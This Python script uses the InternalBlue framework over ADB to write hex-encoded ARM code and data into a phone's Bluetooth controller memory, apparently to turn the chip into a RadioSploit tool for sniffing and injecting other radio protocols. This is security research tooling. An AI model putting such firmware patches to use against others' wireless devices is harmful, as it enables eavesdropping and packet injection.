embedVar.add_field(name=f"{(datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S') + datetime.timedelta(hours=2)).strftime('%H:%M %d/%m/%Y') if match['status_code'] == 0 else f''':red_circle: LIVE {match['minute']}' ''' if match['status_code'] == 1 else ':clock10: Primo Tempo' if match['status_code'] == 11 else 'Partita Terminata'}", value=f"{str(discord.utils.get(client.emojis, name=match['home_team']['short_code']))} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['home_team']['name']} {f'''{match['stats']['home_score']} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '} - {'**'if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['stats']['away_score']}''' if match['status_code'] != 0 else ' - '} {match['away_team']['name']}{'**' if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '} {str(discord.utils.get(client.emojis, name=match['away_team']['short_code']))}", inline=False)
await message.edit(embed=embedVar, mention_author=False)
emojis = ["🕙"]
for emoji in emojis:
await message.add_reaction(emoji)
async def match_now(message, client, FOOTBALL_API_HEADERS):
my_round = {}
params = (
("season_id","2100"),
)
matches_req = requests.get('https://app.sportdataapi.com/api/v1/soccer/matches', headers=FOOTBALL_API_HEADERS, params=params).json()
matches = []
for match in matches_req['data']:
if match['round']['is_current']:
my_round = {'name': str(match['round']['name']), 'id': match['round']['round_id']}
matches.append(match)
matches.sort(key=lambda match: datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S'))
embedVar = discord.Embed(
title=f'{my_round["name"]}a Giornata di Serie A TIM',
color=0x00197d
)
embedVar.set_thumbnail(url="https://www.legaseriea.it/assets/legaseriea/images/logo_main_seriea.png?v=34")
for match in matches:
embedVar.add_field(name=f"{(datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S') + datetime.timedelta(hours=2)).strftime('%H:%M %d/%m/%Y') if match['status_code'] == 0 else f''':red_circle: LIVE {match['minute']}' ''' if match['status_code'] == 1 else ':clock10: Primo Tempo' if match['status_code'] == 11 else 'Partita Terminata'}", value=f"{str(discord.utils.get(client.emojis, name=match['home_team']['short_code']))} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['home_team']['name']} {f'''{match['stats']['home_score']} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '} - {'**'if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['stats']['away_score']}''' if match['status_code'] != 0 else ' - '} {match['away_team']['name']}{'**' if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '} {str(discord.utils.get(client.emojis, name=match['away_team']['short_code']))}", inline=False)
await message.edit(embed=embedVar, mention_author=False)
emojis = ["⬅️", "➡️","🔄"]
for emoji in emojis:
await message.add_reaction(emoji)
| 56.737805
| 1,141
| 0.633423
| 1,285
| 9,305
| 4.449805
| 0.108949
| 0.069955
| 0.083945
| 0.066457
| 0.941413
| 0.941413
| 0.937041
| 0.937041
| 0.937041
| 0.921126
| 0
| 0.012931
| 0.152284
| 9,305
| 163
| 1,142
| 57.08589
| 0.710446
| 0.019022
| 0
| 0.79798
| 0
| 0.121212
| 0.597872
| 0.268233
| 0
| 0
| 0.003547
| 0
| 0
| 1
| 0
| false
| 0
| 0.030303
| 0
| 0.030303
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
50ba4e237edb90dd6831a37367d420d4abd52d4a
| 6,596
|
py
|
Python
|
ironic_neutron_plugin/tests/unit/drivers/cisco/fixtures.py
|
rackerlabs/ironic-neutron-plugin
|
7b3e19840048bc49d846362b84973c2f2b03b05e
|
[
"Apache-2.0"
] | 10
|
2015-01-21T22:04:40.000Z
|
2017-06-29T06:55:45.000Z
|
ironic_neutron_plugin/tests/unit/drivers/cisco/fixtures.py
|
rackerlabs/ironic-neutron-plugin
|
7b3e19840048bc49d846362b84973c2f2b03b05e
|
[
"Apache-2.0"
] | null | null | null |
ironic_neutron_plugin/tests/unit/drivers/cisco/fixtures.py
|
rackerlabs/ironic-neutron-plugin
|
7b3e19840048bc49d846362b84973c2f2b03b05e
|
[
"Apache-2.0"
] | 8
|
2015-01-30T16:40:30.000Z
|
2020-07-23T06:06:53.000Z
|
# Copyright (c) 2014 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def ok():
res = """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:e7ef8254-10a6-11e4-b86d-becafe000bed">
<data/>
</rpc-reply>"""
return res
def show_dhcp(port):
dhcp = ("ip source binding 10.0.0.1 FFFF.FFFF.FFFF.FFFF "
"vlan 1 interface port-channel%s") % (port)
res = """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:4a9be8b4-df85-11e3-ab20-becafe000bed">
<data>
!Command: show running-config dhcp | egrep port-channel%(port)s$
!Time: Mon May 19 18:40:08 2014
version 6.0(2)U2(4)
interface port-channel%(port)s
%(dhcp)s
</data>
</rpc-reply>"""
return res % ({'port': port,
'dhcp': dhcp})
def show_port_channel_config_trunked(port):
res = """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:4a9be8b4-df85-11e3-ab20-becafe000bed">
<data>
!Command: show running-config interface port-channel%(port)s
!Time: Mon May 19 18:40:08 2014
version 6.0(2)U2(4)
interface port-channel%(port)s
description CUST39a8365c-3b84-4169-bc1a-1efa3ab20e04-host
switchport mode trunk
switchport trunk allowed vlan 1,2
ip verify source dhcp-snooping-vlan
spanning-tree port type edge trunk
no negotiate auto
vpc %(port)s
</data>
</rpc-reply>"""
return res % ({'port': port})
def show_ethernet_config_trunked(port):
res = """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:4a9be8b4-df85-11e3-ab20-becafe000bed">
<data>
!Command: show running-config interface Ethernet1/%(port)s
!Time: Mon May 19 18:40:08 2014
version 6.0(2)U2(4)
interface Ethernet1/%(port)s
description CUST39a8365c-3b84-4169-bc1a-1efa3ab20e04-host
no lldp transmit
switchport mode trunk
switchport trunk allowed vlan 1,2
spanning-tree port type edge trunk
spanning-tree bpduguard enable
channel-group %(port)s mode active
</data>
</rpc-reply>"""
return res % ({'port': port})
def show_ethernet_config_access(port):
res = """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:4a9be8b4-df85-11e3-ab20-becafe000bed">
<data>
!Command: show running-config interface Ethernet1/%(port)s
!Time: Mon May 19 18:40:08 2014
version 6.0(2)U2(4)
interface Ethernet1/%(port)s
description CUST32fdc565-7860-47b9-be57-f5d5ee1875a0-host
switchport access vlan 3
spanning-tree port type edge
spanning-tree bpduguard enable
</data>
</rpc-reply>"""
return res % ({'port': port})
def show_port_channel_status(port):
status = "vPC Status: Up, vPC number: %s" % (port)
res = """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:c87305ee-0d19-11e4-ab20-becafe000bed">
<data>
<show>
<interface>
<__XML__INTF_ifeth>
<__XML__PARAM_value>
<__XML__INTF_output>port-channel%(port)s</__XML__INTF_output>
</__XML__PARAM_value>
<__XML__OPT_Cmd_show_interface_if_eth___readonly__>
<__readonly__>
<TABLE_interface>
<ROW_interface>
<interface>port-channel%(port)s</interface>
<state>up</state>
<vpc_status>%(status)s</vpc_status>
</ROW_interface>
</TABLE_interface>
</__readonly__>
</__XML__OPT_Cmd_show_interface_if_eth___readonly__>
</__XML__INTF_ifeth>
</interface>
</show>
</data>
</rpc-reply>"""
return res % ({'port': port,
'status': status})
def show_ethernet_status(port):
res = """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:c87305ee-0d19-11e4-ab20-becafe000bed">
<data>
<show>
<interface>
<__XML__INTF_ifeth>
<__XML__PARAM_value>
<__XML__INTF_output>ethernet1/%(port)s</__XML__INTF_output>
</__XML__PARAM_value>
<__XML__OPT_Cmd_show_interface_if_eth___readonly__>
<__readonly__>
<TABLE_interface>
<ROW_interface>
<interface>ethernet1/%(port)s</interface>
<state>up</state>
</ROW_interface>
</TABLE_interface>
</__readonly__>
</__XML__OPT_Cmd_show_interface_if_eth___readonly__>
</__XML__INTF_ifeth>
</interface>
</show>
</data>
</rpc-reply>"""
return res % ({'port': port})
| 33.825641
| 74
| 0.608096
| 887
| 6,596
| 4.335964
| 0.201804
| 0.014561
| 0.043682
| 0.054602
| 0.75221
| 0.73765
| 0.709048
| 0.709048
| 0.700988
| 0.643526
| 0
| 0.070491
| 0.249394
| 6,596
| 194
| 75
| 34
| 0.706322
| 0.085052
| 0
| 0.790541
| 0
| 0.047297
| 0.884385
| 0.256811
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047297
| false
| 0
| 0
| 0
| 0.094595
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50de7bc9dd52da659150da303de2ad03d25e2b25
| 2,680
|
py
|
Python
|
mahjonggscoring/rules/test/test_two_kongs.py
|
kajiki/py-mahjongg-scoring
|
b23202de018a8206a4be5594247faa0754e7e54e
|
[
"MIT"
] | null | null | null |
mahjonggscoring/rules/test/test_two_kongs.py
|
kajiki/py-mahjongg-scoring
|
b23202de018a8206a4be5594247faa0754e7e54e
|
[
"MIT"
] | null | null | null |
mahjonggscoring/rules/test/test_two_kongs.py
|
kajiki/py-mahjongg-scoring
|
b23202de018a8206a4be5594247faa0754e7e54e
|
[
"MIT"
] | null | null | null |
import unittest2
from mahjonggscoring.rules import TwoKongs
from mahjonggscoring import Hand
#Both kongs are melded.
class TestTwoKongsPartial(unittest2.TestCase):
def setUp(self):
data = [["W", "W", "W"], ["8#", "8#", "8#", "8#"], ["3#", "3#", "3#", "3#"], ["2/", "2/", "2/"], ["3●", "3●"]]
hand = Hand(data, {"concealed": [False, False, False, True, False]})
self.examination = TwoKongs(hand)
self.passed = self.examination.evaluate()
def test_passed(self):
self.assertTrue(self.passed)
def test_points(self):
self.assertEqual(self.examination.points, 4)
class TestTwoKongsExplicit(unittest2.TestCase):
def setUp(self):
data = [["W", "W", "W"], ["8#", "8#", "8#", "8#"], ["3#", "3#", "3#", "3#"], ["2/", "2/", "2/"], ["3●", "3●"]]
hand = Hand(data, {"concealed": False})
self.examination = TwoKongs(hand)
self.passed = self.examination.evaluate()
def test_passed(self):
self.assertTrue(self.passed)
def test_points(self):
self.assertEqual(self.examination.points, 4)
class TestTwoKongsImplicit(unittest2.TestCase):
def setUp(self):
data = [["W", "W", "W"], ["8#", "8#", "8#", "8#"], ["3#", "3#", "3#", "3#"], ["2/", "2/", "2/"], ["3●", "3●"]]
hand = Hand(data)
self.examination = TwoKongs(hand)
self.passed = self.examination.evaluate()
def test_passed(self):
self.assertTrue(self.passed)
def test_points(self):
self.assertEqual(self.examination.points, 4)
class TestNotTwoKongs(unittest2.TestCase):
def test_not_kong(self):
data = [["6/", "6/", "6/"], ["2/", "3/", "4/"], ["F", "F", "F"], ["2/", "3/", "4/"], ["8/", "8/"]]
hand = Hand(data)
self.examination = TwoKongs(hand)
self.passed = self.examination.evaluate()
self.assertFalse(self.passed)
def test_not_melded(self):
data = [["W", "W", "W"], ["8#", "8#", "8#", "8#"], ["3#", "3#", "3#", "3#"], ["2/", "2/", "2/"], ["3●", "3●"]]
hand = Hand(data, {"concealed": [False, True, True, False, False]})
self.examination = TwoKongs(hand)
self.passed = self.examination.evaluate()
self.assertFalse(self.passed)
def test_one_melded(self):
data = [["W", "W", "W"], ["8#", "8#", "8#", "8#"], ["3#", "3#", "3#", "3#"], ["2/", "2/", "2/"], ["3●", "3●"]]
hand = Hand(data, {"concealed": [False, False, True, False, False]})
self.examination = TwoKongs(hand)
self.passed = self.examination.evaluate()
self.assertFalse(self.passed)
def test_special_hand(self):
data = [["5/", "5/", "3/", "3/", "4/", "4/", "8/", "8/", "6/", "6/", "7/", "7/", "5/", "5/"]]
hand = Hand(data)
self.examination = TwoKongs(hand)
self.passed = self.examination.evaluate()
self.assertFalse(self.passed)
if __name__ == '__main__':
unittest2.main()
| 35.733333
| 112
| 0.58209
| 364
| 2,680
| 4.252747
| 0.134615
| 0.021964
| 0.01938
| 0.122093
| 0.80168
| 0.80168
| 0.80168
| 0.80168
| 0.80168
| 0.80168
| 0
| 0.043137
| 0.143657
| 2,680
| 75
| 113
| 35.733333
| 0.627015
| 0.008209
| 0
| 0.683333
| 0
| 0
| 0.091046
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.216667
| false
| 0.283333
| 0.05
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
50e8f206f440bdcbbd9bd939abccd9fc80b74198
| 102
|
py
|
Python
|
base/__init__.py
|
ohshyuk5/stable-baselines-tf2
|
02442226c6b2b3729c8772e2903963ad590313f7
|
[
"MIT"
] | 16
|
2020-02-13T04:19:28.000Z
|
2021-12-25T16:13:53.000Z
|
base/__init__.py
|
ohshyuk5/stable-baselines-tf2
|
02442226c6b2b3729c8772e2903963ad590313f7
|
[
"MIT"
] | 3
|
2020-01-28T06:00:44.000Z
|
2020-02-11T07:56:46.000Z
|
base/__init__.py
|
ohshyuk5/stable-baselines-tf2
|
02442226c6b2b3729c8772e2903963ad590313f7
|
[
"MIT"
] | 2
|
2020-01-15T07:18:02.000Z
|
2020-01-15T08:26:57.000Z
|
from base.rl import BaseRLAlgorithm, ActorCriticRLAlgorithm, ValueBasedRLAlgorithm, TensorboardWriter
| 51
| 101
| 0.892157
| 8
| 102
| 11.375
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068627
| 102
| 1
| 102
| 102
| 0.957895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
50ed362e4a60fb0851df88e2216c212b20e8974c
| 12,181
|
py
|
Python
|
patch.py
|
RCayre/radiosploit_patches
|
bdab0d60c67658232d810e375a63ce2a5342cdbf
|
[
"MIT"
] | 11
|
2021-07-01T07:15:11.000Z
|
2021-08-29T21:57:56.000Z
|
patch.py
|
RCayre/radiosploit_patches
|
bdab0d60c67658232d810e375a63ce2a5342cdbf
|
[
"MIT"
] | null | null | null |
patch.py
|
RCayre/radiosploit_patches
|
bdab0d60c67658232d810e375a63ce2a5342cdbf
|
[
"MIT"
] | 3
|
2021-07-01T07:15:12.000Z
|
2021-07-27T14:23:53.000Z
|
from pwnlib.asm import asm
from internalblue import Address
from internalblue.adbcore import ADBCore
from struct import pack
import os
# setup ADB Core
internalblue = ADBCore(serial=True)
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# connect internalblue to the device
if not internalblue.connect():
print("No connection to the device !")
exit(-1)
# Data / variables
print("Installing data / variables...")
internalblue.writeMem(0x00203124, bytes.fromhex('10022800'))
internalblue.writeMem(0x00210500, bytes.fromhex('00000000'))
internalblue.writeMem(0x00210504, bytes.fromhex('00000000'))
internalblue.writeMem(0x00210508, bytes.fromhex('00000000'))
internalblue.writeMem(0x0021050c, bytes.fromhex('00000000'))
internalblue.writeMem(0x00210510, bytes.fromhex('ff'))
internalblue.writeMem(0x00210514, bytes.fromhex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'))
internalblue.writeMem(0x0021053c, bytes.fromhex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'))
internalblue.writeMem(0x0021063b, bytes.fromhex('00ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'))
internalblue.writeMem(0x00210670, bytes.fromhex('00000000'))
internalblue.writeMem(0x00210674, bytes.fromhex('00000000'))
internalblue.writeMem(0x00210678, bytes.fromhex('00000000'))
internalblue.writeMem(0x0021067c, bytes.fromhex('03f73a1b3970af339a03f73ab239702f3b9b0377aeb33970f73a9b0370afb339fc08c564c68f504c65fc08454dc68f50c464fc08514cc60f08c5647c8f504c46'))
internalblue.writeMem(0x002106c0, bytes.fromhex('00000000'))
internalblue.writeMem(0x002106c4, bytes.fromhex('00000000'))
internalblue.writeMem(0x002106c8, bytes.fromhex('00000000'))
internalblue.writeMem(0x002106cc, bytes.fromhex('526164696f53706c6f6974'))
# Functions and callbacks
print("Installing function and callbacks...")
internalblue.writeMem(0x00210700, bytes.fromhex('2de9f04fa54b1b68002b00f0e281a44b1b6803f48073002b00f0d881a14b1b68002b40f0d381ff2200219f48f0f5f4f8ff229e499c48f0f5cdf8984b1b68012b35d1994a9a499b4808f05af9984b1b68002b00f0b781964b1b683b2b00f2b281934b1b68dbb20433d8b2914b1b68dbb20233dbb21a46ff2158f6b3ff044604f10a03864a1268d2b21a7004f10b038a4a1268d2b21a7004f10c00854b1b681a468449f1f5e9ff204658f67cfe8ae17b4b1b68022b47d17c4a7d497e4808f020fc7b4b1b68dbb27d4a19467a4808f098fb0346002b00f07681754b1b68dab2774b1b78d31adbb20833d8b2714b1b68dab2724b1b78d31adbb20633dbb21a46ff2158f66fff044604f10a03644a1268d2b21a7004f10b03684a1268d2b21a7004f10c00664b1b78043b624a9918604b1b68624a12789b1a04331a46f1f59dff204658f630fe3ee1554b1b68032b22d15c4b1a465749574808f0d3fb0322ff21052058f63fff044604f10a034c4a1268d2b21a7004f10b03504a1268d2b21a7004f10c0301224b491846f1f576ff204658f609fe17e1414b1b68042b79d1424a4449444808f0adfb424b1b68dbb2434a1946404808f025fb0346002b00f003813f4b1b78043b3b4ad35c1a463e4b1b68dbb29a4240f0f780394b1b78033b354ad35c1a46384b1b681b0adbb29a4240f0ea80324b1b78023b2f4ad35c1a46314b1b681b0cdbb29a4240f0dd802c4b1b78013b284ad35c1a462b4b1b681b0e9a4240f0d180234b1b68dab2244b1b78d31adbb20833d8b21e4b1b68dab2204b1b78d31adbb20633dbb21a46ff2158f6cafe044604f10a03114a1268d2b21a7004f10b03154a1268d2b21a7004f10c00134b1b78043b104a99180e4b1b68104a12789b1a04331a46f1f5f8fe204658f68bfd99e0024b1b68052b55d100241fe000052100ac8b3100780621003c05210000243700700621003c06210004052100100521003d052100c0062100454b1b5d184608f017f903461a46424b1a550134c72cf3dd0722ff21092058f67cfe044604f10a033c4a1268d2b21a7004f10b033a4a1268d2b21a7004f10c05384b1b68dbb2184608f0f6f803462b7004f10d05334b1b681b0adbb2184608f0ebf803462b7004f10e0303222a491846f1f59efe204658f631fd3fe0274b1b68062b3bd1002409e0234b1b5d184608f0d3f803461a46204b1a550134c72cf3dd21491d4808f048fc03461a461f4b1a601e4b1b68dbb20433d8b21c4b1b68dbb20233dbb21a46ff2158f627fe044604f10a03124a1268d2b21a7004f10b03104a1268d2b21a7004f10c00104b1b681a460d49f1f55dfe204658f6f0fc0c4b01221a6002e00a4b00221a60bde8f04f2de9f0416bf6d9be00bf3c0521000005210004052100c80621003c0621007006210078062100'))
internalblue.writeMem(0x00210c00, bytes.fromhex('074b1b68002b03d1064b1b68002b01d0002301e0044b1b6860f6cebc00bf00bf000521000805210050312000'))
internalblue.writeMem(0x00210d00, bytes.fromhex('1a4b1b68002b2ad0184b1b68012b03d117487ff685b928e0144b1b68022b03d0124b1b68042b04d14ff033307ff678b91be00e4b1b68052b04d14ff0aa407ff66fb912e0094b1b68032b03d0074b1b68062b0ad1074800687ff662b905e010b108467ff65db97ff68db900bf0005210003f73a9bc0062100'))
internalblue.writeMem(0x00210e00, bytes.fromhex('0fb4094b1b68002b09d008480068084940f0800008600fbc69f6cfb902e00fbc69f6b9b900bf00bf0005210004052100a4863100'))
internalblue.writeMem(0x00210f00, bytes.fromhex('2de9f04f0746042283b0ff21062058f6e8fb634e3b7bdff890b1012bcbf80030814633467a7bdff8948106bf02eb8202343a023ac8f8002006f12804002203f8012f9c424ff00005f9d1564a0121422311725372202106231046d372157355739573d573157455749172019283f638f9dbf800309bb9dbf80030d8f80000522189f80d004846582289f80c3089f80a1089f80b2003b0bde8f04f58f683ba019a531e03f8015f9c424ff0000af9d10123137213739373d37341202021082350729172d37299211923364882f80da0117491745374d374019283f6a0f8019a06f801afb4424ff00005f9d101234220137213732021062350722a48d37255739573d57315745574917283f6eaf8dbf80030254e022b06d1ba7b2449521b18bf01220a60aae7032b1fd0042b32d0062ba2d11f4d052207f10e012846f1f59dfba87807f0defd0446687807f0dafd0304287843ea046407f0d4fd44f05504154a44ea00203368106088e7114c134d07f10e0104222046f1f580fb7023214605222846237108f03df8d5f805100a4a3368116073e7d7f80e000749044a086015606ce7130521001405210000052100c40621003c052100c00621003c06210004052100'))
internalblue.writeMem(0x00214400, bytes.fromhex('08480068002807d007487bf609fe0023064a136060f6cabc7bf630fe60f6c6bc00bf00000805210003f73a9ba5790200'))
internalblue.writeMem(0x00214500, bytes.fromhex('06480068002803d0054a126860f643bdd4f8882260f63fbd00bf0000080521000c052100'))
internalblue.writeMem(0x00214600, bytes.fromhex('80b588b000af78609e4b01221a607b680c331b78012b08d17b680d331b78184604f06ef903461a4604e07b680d331b78023b1a46944b1a607b680e331b781a46924b1a607b680c331b78012b40f08c800023fb6107e08e4afb69134400221a70fb690133fb61fb69032bf4dd7b6803f10f01864b1b681a468648eef57df80023bb6107e0844abb69134400221a70bb690133bb61bb69fe2bf4dd00237b615ce07b4a7b6913441b781b09fb72784a7b6913441b7803f00f03bb727b69db00ba7a764911f82210744ad1547b69db005a1cbb7a72499b000b4459786f4b99547b69db009a1cbb7a6d499b000b4499786a4b99547b69db00da1cbb7a68499b000b44d978654b99547b69db000433fa7a634911f82210604ad1547b69db005a1dfb7a5e499b000b4459785b4b99547b69db009a1dfb7a59499b000b449978564b99547b69db00da1dfb7a54499b000b44d978514b99547b6901337b614c4b1b681a1d7b699a429cd84ce07b680c331b78022b09d07b680c331b78032b04d07b680c331b78042b11d17b6803f10f013f4b1b681a463f48edf5f0ff3c4b1b68dbb21a463b493d4804f0acfc2be07b680c331b78052b04d07b680c331b78062b21d17b6803f10f01314b1b681a463148edf5d4ff00233b6110e02e4a3b6913441b78184604f00efa034619462b4a3b6913440a461a703b6901333b613a69244b1b689a42e9d3274b4ff4ba621a60264b05221a60254b10221a607b680c331b78012b0fd11a4b1b680433db001a461b491f48edf5a3ff1f4a154b1b680433db0013601de07b680c331b78042b0dd8104b1b685b001a4611491548edf58fff154a0b4b1b685b0013600ae0094b1b681a460a490f48edf582ff0e4b054a12681a600023fb6020e000bf080521000c052100700621003c062100400621003c0521007c062100382123004021230044212300c02e2300c0322300174afb68134400221a70fb680133fb60fb68272bf4dd124b01221a72104b39225a720f4b20229a720d4b0622da720c4b01221a730a4b01225a73094b00229a73074b0022da73064b00221a74044b00225a7403487ff6b6f900bf2037bd4680bd14052100'))
internalblue.writeMem(0x00214f00, bytes.fromhex('2de9ff4f214b1b68002b37d00422ff21062054f6e6fb0546002403e01c4b00221a550134272cf9dd194b01221a72184b3c225a72164b20229a72154b0122da72134b00221a7312487ef670fe0f4b00221a6005f10a0354221a7005f10b0358221a7005f10c0301221a7005f10d03094a1268d2b21a70284654f694fabde8ff4f23689a425cf654bf00bf00bf08052100140521000c052100'))
internalblue.writeMem(0x00218700, bytes.fromhex('2de9f041002600f1ff3c304601391cf8017f11f801ef07f07f08012200e00132c2f1080447fa04f34efa04f56b404eb1dc0700d50130082af1d10136042ee6d1bde8f081012af3d148fa04f46c40e307f0d4e4e7'))
internalblue.writeMem(0x00218800, bytes.fromhex('002912dd10b4002207e032b110f8013c047843ead41300f8013c037801325b00914200f8013bf0d110bc7047'))
internalblue.writeMem(0x00218900, bytes.fromhex('00eb800034387047'))
internalblue.writeMem(0x00218a00, bytes.fromhex('2de9f04f054683b001919346431e00f13101002203f8012f8b42fbd12b78cbf1010643f007032b7034495846fff768fe082814d90bf1ff3301210ae058781a78440042ead012ff291a705c70ecd001310133de42f2d15a7852005a70f7e700231e46012700930bf1ff3acbeb0704dff88c804ff0000941465846fff741fe082808f1040809d909f10109b9f1100ff2d1019b1e6003b0bde8f08f009b53b3ab5db90009fa01f21343ab5587f00103012f1f464ff0010308bf013600934ff0200c5346012001e001300133dc420ed059781a784fea410eff2842ead111197083f801e0f0d1bcf1010cead1c0e75a7852005a70e8e7b9f10a0fe0d1d0e77c062100'))
internalblue.writeMem(0x00218c00, bytes.fromhex('c109430141eac01103f04003c200194302f020024300114303f010034210194302f00802c3100a4303f004034011134300f002001843c0b2704700bf'))
internalblue.writeMem(0x00218d00, bytes.fromhex('1b68034a13605a0661f650b900bf0000c8062100'))
internalblue.writeMem(0x00218e00, bytes.fromhex('013910b44ff0000216d410f8014b082382ea042212f4004f4fea420418bf84f4815203f1ff3314bf82f00102520013f0ff03efd10139e8d590b210bc704700bf'))
internalblue.writeMem(0x00218f00, bytes.fromhex('2de9f0470026a1f1020eb645167047dd8046074630460139dff88c9008eb010cf044c6eb0e05013dba464ff0000116d41af8014b082381ea042111f4004f4fea410418bf84f4815103f1ff3314bf81f00101490013f0ff03efd1013de8d59cf8004098f8003089b243ea0423994213d0d9f80030012b06d00136764507f10107cfdbbde8f08739781129f5d17978222904bf18461670efe716700120bde8f0873046bde8f08700bfc4062100'))
internalblue.writeMem(0x00219000, bytes.fromhex('f8b504460d461746002601e0322e31d0b95dbb19c8108a105b7800f0080002f00402024301f001004910024301f00201580011434fea830e20f07f0008430ef0400eda0040ea0e0002f020021b0103f0100310431843c0b2fff7d2fd80f05a00c0b2c6f34603a52806f10206e054cdd12b60f8bd19232b60f8bd00bf'))
internalblue.writeMem(0x00219100, bytes.fromhex('002a56d02de9f041074601f1ff3800eb420618f8010f023780f05a00fff770fd044645b205f00400a101e310621040eac41001f0400103f0010e0843510140ea0e0001f020011201014302f0100260000a435b0000f0080003f0020310431843c0b2fff74dfd05f02003c4f3c71522112b4343eac213920143ea450502f040026308a411154303f01002e300154303f00803a4001d4304f004042c4307f8020ce0b2fff72dfd07f8010cbe42b1d1bde8f0817047'))
internalblue.writeMem(0x00219200, bytes.fromhex('2de9f0411d4b1b6813f0ff072ad0c3f30728b8f1000f25d0c3f3074cbcf1000f20d0a1f1030e4feace0ebef1000fc8bf002617dd81b10346002406e013f8012c1d7842ead51203f8012c1a78013452008c4203f8012bf1d18378bb4205d001367645e7d10020bde8f081c3784345f6d103796345f3d10120bde8f081c0062100'))
